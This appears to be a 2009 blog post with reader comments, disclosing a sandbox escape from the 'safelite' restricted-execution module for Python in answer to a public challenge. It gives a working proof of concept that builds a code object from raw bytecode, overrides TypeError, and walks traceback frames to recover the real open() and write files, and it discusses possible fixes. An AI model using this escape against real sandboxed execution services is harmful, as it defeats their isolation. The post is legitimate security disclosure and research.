Monday, February 23, 2009

safelite exploit

Tav recently issued a challenge to get around the security of a module he made, intended to create a sort of restricted execution sandbox in the Python interpreter. Apparently if it can be made secure enough after lots of people look at it, then it could get included in the Python standard library.

That seems like a worthwhile thing to have available; it would make services like Google App Engine easier to implement and secure. It works (at least, the current version does) by trying to hide anything that code could use to write to the local filesystem. You get a replacement function for file()/open() which only allows opening in read mode, and __import__(), execfile(), reload(), etc., are taken out of the builtins dictionary. So (hopefully) the user cannot import anything at all.
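
To make the idea of hiding builtins concrete, here is a rough sketch in Python 3 syntax. It is not how safelite itself works: it assumes a filtered builtins dictionary handed to exec(), and the names BLOCKED, safe_builtins and run_restricted are invented for the illustration.

```python
import builtins

# Hypothetical block list for illustration; safelite's real list differs.
BLOCKED = ("__import__", "open")

# Copy every builtin except the blocked names into a fresh dictionary.
safe_builtins = {
    name: value
    for name, value in vars(builtins).items()
    if name not in BLOCKED
}


def run_restricted(source):
    """Run source against the filtered builtins and report what happened."""
    env = {"__builtins__": safe_builtins}
    try:
        exec(source, env)
    except (ImportError, NameError) as exc:
        return type(exc).__name__
    return "ok"


import_result = run_restricted("import os")         # no __import__ to call
open_result = run_restricted("open('somefile')")    # name is simply missing
len_result = run_restricted("len('abc')")           # harmless builtins remain
```

Filtering names like this is only the first layer; the rest of this post is about what leaks through anyway.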

To go further than that, tav removes the func_* attributes from the FunctionType dictionary. If you had func_closure, for example, you would be able to inspect the closure attached to the replacement open() function and get at the real one. (My recipe on ASPN shows you one way to do that.) A few other attributes are removed from the dictionaries of built-in types, like gi_code on GeneratorType.
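
As a small illustration of why the closure attribute matters, here is a sketch in Python 3, where func_closure is spelled __closure__. The wrapper make_reader is a made-up stand-in for the replacement open(), not safelite's actual code.

```python
def make_reader(real_open):
    """Return a read-only wrapper that keeps real_open in its closure."""
    def reader(path, mode="r"):
        if mode not in ("r", "rb"):
            raise ValueError("read-only access")
        return real_open(path, mode)
    return reader


safe_open = make_reader(open)

# The wrapper looks harmless, but its closure cell still holds the original.
leaked = safe_open.__closure__[0].cell_contents
```

Here leaked is the unrestricted open() again, which is exactly what stripping the attribute from the function type is meant to prevent.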

The replacement open() function is (now) carefully coded to avoid trusting any globals or the contents of the __builtins__ dictionary when it is run; otherwise, you'd be able to trick it into misbehaving by changing the values it looks up there.

I came up with an exploit which hinges on the continued presence of the compile() builtin in the sandbox. When you use compile(), you get a code object out. When you have a code object, you can create new code objects (using type(code_object)(arguments)). Since you can come up with arbitrary bytecode to put in a new code object, you can make the code object thus created do a few things that you can't do in normal Python. The most useful one in this case is that you can get access to the traceback object from an exception without sys.exc_info() or sys.exc_traceback.
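
A tame way to see that compile() hands you a code object you can derive new ones from is sketched below. It assumes Python 3.8 or later and uses the code.replace() helper instead of calling type(code_object)(...) directly, since the constructor's argument list changes between versions. It only swaps a constant; it does not touch the bytecode.

```python
# compile() is all that is needed to get hold of a code object.
original = compile("'safe'", "b", "eval")
code_type = type(original)

# Build a second code object that differs only in its constants table.
patched = original.replace(
    co_consts=tuple(
        "patched" if const == "safe" else const
        for const in original.co_consts
    )
)

original_value = eval(original)
patched_value = eval(patched)
```

The exploit itself goes further and supplies a handwritten bytecode string, but the entry point is the same: one code object is enough to reach the code type.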

I won't go too far into details on that, except to say that when you get into an exception handler, the top of the stack holds the exception type, the exception object, and the traceback, the same three values you'd get from sys.exc_info(). Roll a little custom bytecode, and you can store the traceback from the stack rather than throwing it away (which is what the compiler will usually do):

>>> f = type(lambda: 0)(type(compile('1', 'b', 'eval'
))(2, 2, 4, 67, 'y\x08\x00t\x00\x00\x01Wn\x09\x00\x01'
'\x01a\x00\x00n\x01\x00X|\x01\x00|\x00\x00\x83\x01\x00S',
(None,), ('stuff',), ('g', 'x'), 'q', 'f', 1, ''),
globals(), None, (TypeError,))
>>> import dis
>>> dis.dis(f)
  1           0 SETUP_EXCEPT             8 (to 11)
              3 LOAD_GLOBAL              0 (stuff)
              6 POP_TOP
              7 POP_BLOCK
              8 JUMP_FORWARD             9 (to 20)
        >>   11 POP_TOP
             12 POP_TOP
             13 STORE_GLOBAL             0 (stuff)
             16 JUMP_FORWARD             1 (to 20)
             19 END_FINALLY
        >>   20 LOAD_FAST                1 (x)
             23 LOAD_FAST                0 (g)
             26 CALL_FUNCTION            1
             29 RETURN_VALUE


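That function passes its argument to the original TypeError (kept as a default argument) and returns the result. It is built that way because I need to get it to run underneath the replacement open() function, and the easiest way (there are others) is to override TypeError, the only global that open() references.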

__builtins__.TypeError = f
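
The same trick can be sketched in plain Python 3, without any custom bytecode. The function checked() is a hypothetical stand-in for the replacement open(), and hook() plays the part of f: it keeps the real TypeError as a default argument so it can still return a genuine exception after the builtin name has been swapped.

```python
import builtins


def checked(mode):
    """Stand-in for the replacement open(): it looks up TypeError by name."""
    if not isinstance(mode, str):
        raise TypeError("mode must be a string")
    return mode


calls = []
real_type_error = builtins.TypeError


def hook(message, original=real_type_error):
    # Runs underneath checked(), i.e. with checked()'s frame as its caller.
    calls.append(message)
    return original(message)


builtins.TypeError = hook
try:
    try:
        checked(2)
    except real_type_error:
        pass  # the caller still sees an ordinary TypeError
finally:
    builtins.TypeError = real_type_error  # always undo the override
```

After this runs, calls holds the message that checked() tried to raise, which shows that the hook really executed inside the guarded function.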


I just call the replacement open() with a mode parameter of 2, so that it will load and call TypeError:

FileReader('foo', 2)


...whereupon it has kindly stored the traceback object in the global dict under the name "stuff". Traceback objects contain references to frame objects, and you can follow frame objects up the call chain, and so we can easily get to the frame containing the replacement open() function:

stuff.tb_frame.f_back


From that point, it's trivial to pull out the real open() function from the local variables of the frame, and use it:

stuff.tb_frame.f_back.f_locals['open_file']\
('w00t', 'w').write('yay\n')
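
The frame-walking step can be tried on its own with the sketch below, written for Python 3. It gets the traceback through the documented sys.exc_info() route (which the sandbox does not offer), and guarded(), probe() and the local name secret are invented for the example.

```python
import sys


def guarded(callback):
    """Stand-in for the replacement open(): it holds a private local."""
    secret = "the real open()"  # placeholder for the hidden function
    return callback()


def probe():
    try:
        raise NameError("stuff")
    except NameError:
        tb = sys.exc_info()[2]  # traceback for the exception just caught
    # tb_frame is probe's own frame; f_back is whoever called probe.
    caller = tb.tb_frame.f_back
    return caller.f_locals["secret"]


leaked = guarded(probe)
```

Once any traceback or frame object is reachable, every local variable further up the call chain is reachable too.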


That works in Python 2.4 through 2.6, and probably some earlier 2.x versions. I seriously doubt it works in 3.0, but I haven't tried, and it might be adaptable to work there.

What's the right approach to fixing this hole? I'm not sure. If tav decides to disallow compile(), I haven't yet found any other way to get at a code object, so that would plug it up as far as I know. On the other hand, it would be real nice to be able to keep compile() and give the restricted-environment users as much power as possible without sacrificing security. If it is possible to remove f_back or f_locals or tb_frame from their respective builtin-type dictionaries, that would plug the hole, but would probably break the reporting and display of normal exception tracebacks.

Maybe Python can be made not to provide the traceback object in an exception handler's stack frame. I admit I don't even know why it does. Does it support some old, no-longer-documented syntax? That would plug up this hole without sacrificing any functionality that I know of, but there might remain some related exploits.

5 comments:

  1. Hey Paul,

    This is hardcore! After all that playing with Python, I never realised that one could get hold of a traceback object so easily.

    I fixed the TypeError hole, but that still leaves a decision to be made about whether to remove compile or tb_frame... I'm edging towards the latter...

    What do you think?

  2. I'd love to keep compile() available if possible.

  3. This works in py3k if you insert an extra 0 parameter as the second argument to the code object constructor, and change the code string and the final argument to be bytestrings, not unicode.

  4. So this doesn't really affect the safelite approach, but it looks like the Python compiler always produces code to throw away the traceback object from the stack when handling an exception. I am mystified as to why it gets put there at all.

  5. this is probably the most hardcore thing i've ever seen
